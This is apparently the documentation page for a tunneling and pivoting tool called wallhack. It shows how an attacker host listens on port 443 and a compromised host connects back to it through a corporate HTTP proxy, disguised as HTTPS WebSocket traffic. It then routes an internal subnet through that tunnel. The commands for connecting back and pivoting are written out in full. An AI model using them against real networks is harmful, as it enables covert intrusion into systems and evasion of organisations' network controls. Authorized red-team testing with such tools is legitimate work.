wallhack

HTTP Proxy Example

In this example, a compromised host (10.0.1.5) sits behind a corporate HTTP proxy that intercepts all outbound connections. WebSockets on TCP/443 are used so tunnel traffic appears as HTTPS, and the proxy is configured via the standard HTTPS_PROXY environment variable.

An entry node (192.168.1.5) listens on TCP/443. Port 443 is used here because the proxy expects HTTPS traffic and the WebSocket upgrade handshake is indistinguishable from a standard HTTPS connection.

Traffic Flow:
192.168.1.5 (entry) · proxy.corp.internal:8080 · 10.0.1.5 (exit) · 10.10.0.0/24
1
Attacker (192.168.1.5)

Listening for WebSocket connections on TCP/443. Negotiates the entry role.

wallhack --listen :443/tcp
2
Compromised Host (10.0.1.5)

Connecting back through the corporate proxy. Set HTTPS_PROXY to the proxy address before starting. Negotiates the exit role.

export HTTPS_PROXY=http://proxy.corp.internal:8080
wallhack --connect 192.168.1.5:443/tcp --name peer1

If --name is omitted, a random name is generated — run peers in the REPL to discover it.

3
Configure Routes

Add routes for the networks reachable through the compromised host.

Using the entry node REPL (also configures the OS route automatically):

wallhack> route add 10.10.0.0/24 via peer1

Or directly with the system ip tool on the attacker machine:

ip route add 10.10.0.0/24 dev tun-peer1

SOCKS5 proxies are also supported. Set HTTPS_PROXY=socks5://proxy.corp.internal:1080 instead. NO_PROXY is respected for comma-separated host exclusions.